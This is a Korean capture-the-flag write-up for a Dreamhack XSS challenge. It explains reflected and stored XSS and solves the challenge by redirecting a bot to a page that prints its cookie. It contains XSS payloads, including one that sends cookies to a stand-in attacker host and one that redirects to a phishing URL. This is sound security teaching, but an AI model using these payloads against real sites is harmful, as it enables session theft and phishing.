				xss-1


					Problem AUTHOR: dreamhack
					Article Author: Kown Young Jung



---[ Contents
     1. xss-1
     2. Client-side Basic 강의 중 XSS 취약점 부분 리뷰
     3. 문제 풀이
     4. Reference





1. xss-1
 문제는 다음과 같이 제시된다.

======================================================================
여러 기능과 입력받은 URL을 확인하는 봇이 구현된 서비스입니다.
XSS 취약점을 이용해 플래그를 획득하세요. 플래그는 flag.txt, FLAG 변수에
있습니다.

문제 파일: app.py
======================================================================

주어진 문제 파일로부터 flag에 이르는 부분의 동작은 다음과 같음을 알 수 있다.

======================================================================
1. /flag 페이지에 접속 시, "param" 필드에 입력된 값을 POST 방식으로 받아들임
2. check_xss() 함수에 입력 데이터와 flag 값을 인자로 하여 호출
3. 함수에 전달된 param 인자는 urllib.parse.quote() 메서드에 전달되어
   URL 구성요소가 될 수 있도록 만들어짐 (그 데이터는 변경되지 않음)
4. 완성된 URL은 url에 저장되고 url과 cookie를 인자로 하여 read_url() 함수를
   호출
5. 함수에 전달된 cookie를 추가하고 전달된 url에 접속
======================================================================

위 동작에서 5.에서 추가된 cookie의 값이 바로 flag의 값이므로 이를 얻어내는
것이 문제를 푸는 실마리가 될 것이다.

2. Client-side Basic 강의 중 XSS 취약점 부분 리뷰
 서버의 응답에 공격자가 삽입한 악성 스크립트가 포함되어 사용자의 웹
브라우저에서 해당 스크립트가 실행되는 취약점을 Cross Site Scripting(XSS)
이라고 한다. 이는 임의의 악성 스크립트가 실행되도록 만들며 이를 통해 사용자
쿠키 또는 세션을 탈취하여 사용자의 권한을 얻거나 페이지를 변조하는 등의
공격을 진행할 수 있다. 이러한 XSS에 대한 공격을 성공적으로 수행하기 위해서는
두 가지 조건이 전제되어야 한다.

======================================================================
1. 입력 데이터에 대한 충분한 검증 과정의 부재
2. 서버의 응답 데이터를 웹 브라우저 내 페이지에 출력 시에 적용되는 충분한
   검증 과정의 부재
======================================================================

 자바스크립트(Javascript)는 웹 브라우저에서 출력되어지는 페이지의 내용을
조작하거나, 웹 브라우저의 위치를 공격자가 원하는 주소로 변경할 수 있다. 이처럼
사용자의 입장에서 발생하는 행위를 동작 시킬 수 있기 때문에 XSS에 대한 공격
시 자바스크립트가 자주 사용된다.
 자바스크립트를 실행하는 대표적인 방법은 script 태그를 활용하는 방식이
있으며 공격자가 입력 데이터로 script 태그를 전송하여 다른 사용자의 응답에
포함되면 공격자의 자바스크립트가 실행된다. 이에 대한 예시는 다음과 같다.

======================================================================
---[ 쿠키 및 세션
<script>
	alert("hello"); // "hello" 문자열에 대해 alert 실행
	document.cookie; // 현재 페이지의 쿠키(반환 타입: string)
	alert(document.cookie);


	// new Image() 는 이미지를 생성하는 함수
	// src는 이미지의 주소를 지정
	// 공격자의 주소는 http://hacker.dreamhack.io 라고 가정
	// 따라서 다음 코드는 공격자의 주소로 현재 페이지의 쿠키를 요청함
	new Image().src = "http://hacker.dreamhack.io/?cookie=" +
	    		  document.cookies;
</script>

---[ 페이지 변조
<script>
	document; // 사용자의 페이지 정보에 접근
	document.write("Hello, world!!"); // 사용자의 페이지에
			       		  // 데이터를 삽입
</script>

---[ 위치 이동
<script>
	// 피싱 사이트 주소는 "http://hacker.dreamhack.io/phishing"
	// 으로 가정
	// 다음 코드는 사용자의 위치를 피싱 사이트로 변경
	location.href = "http://hacker.dreamhack.io/phishing";

	// 새 창 열기
	window.open("http://hacker.dreamhack.io/");
</script>
======================================================================

 Stored XSS는 악성 스크립트가 서버 내에 존재하는 데이터베이스 또는 파일 등의
형태로 저장되어 있다가 사용자가 저장된 악성 스크립트를 조회하는 순간 발생하는
형태의 XSS이다. 이에 대한 대표적인 예시로 게시판 서비스에서 악성 스크립트가
포함된 게시물을 조회할 때 악성 스크립트가 실행되는 공격 방식이 있다.
 Reflected XSS는 악성 스크립트가 사용자의 요청과 함께 전송되는 형태이다.
사용자가 요청한 데이터가 서버의 응답에 포함되어 HTML 등의 악성 스크립트가
그대로 출력되어 발생한다. 이는 Stored XSS와 다르게 사용자의 요청 데이터에
의해 취약점이 발생하기 때문에, 변조된 데이터가 사용자의 요청으로 전송되는
형태를 유도해야 한다. 가장 간단한 방법으로는 특정 링크를 유도하는 방식이
존재하며 Click Jacking, Open Redirect 등의 다른 취약점과 연계하여
발생시키는 방법도 존재한다. 이에 대한 예시로는 다음과 같은 것을 들 수 있다.
게시판 서비스에서 작성된 게시물을 조회하는 과정을 생각해보자. 그럼 게시물
조회를 위해 입력하는 데이터가 있을 것이다. 여기서 입력 데이터에 대한 충분한
검증이 존재하지 않는다면 이로 인해 Reflected XSS가 발생할 수 있다. 여기서
다음과 같은 시나리오를 생각해볼 수 있을 것이다.

======================================================================
1. 사용자가 게시물 조회를 요청 (데이터에 악성 스크립트 삽입)
2. 서버는 해당 요청에 대하여 조회 결과와 편의상 입력 데이터를 응답에 포함시켜
   전송 (검증 절차 없음)
3. 서버가 보낸 응답을 웹 브라우저가 해석하게 되어 악성 스크립트가 실행됨
   (즉, 해당 스크립트가 반영(Reflect)된 것)
======================================================================

3. 문제 풀이
 1.에서 flag의 값이 추가된 쿠키의 값과 같음을 확인하였고, 2.에서 공격자의
주소로 쿠키를 가져오는 방법과 사이트 이동에 대해 요약하였다. 이 문제에서 쿠키를
출력하기 위해서는 입력 데이터를 그대로 출력하는 함수가 필요하다. 이는 /memo가
해결해줄 것이다. 즉, /flag에서 /memo를 사용하여 쿠키 값을 출력하는 페이지로
이동하는 스크립트를 전달하면 되는 것이다. 그 입력 데이터는 다음과 같다.

======================================================================
Input: <script>location.href='memo?memo='+document.cookie</script>
======================================================================

그럼 이제 /memo에 flag 값이 출력되었을 것이다.

4. Reference
 [1] https://dreamhack.io/learn/7#11
 [2] https://docs.python.org/ko/3/library/urllib.parse.html
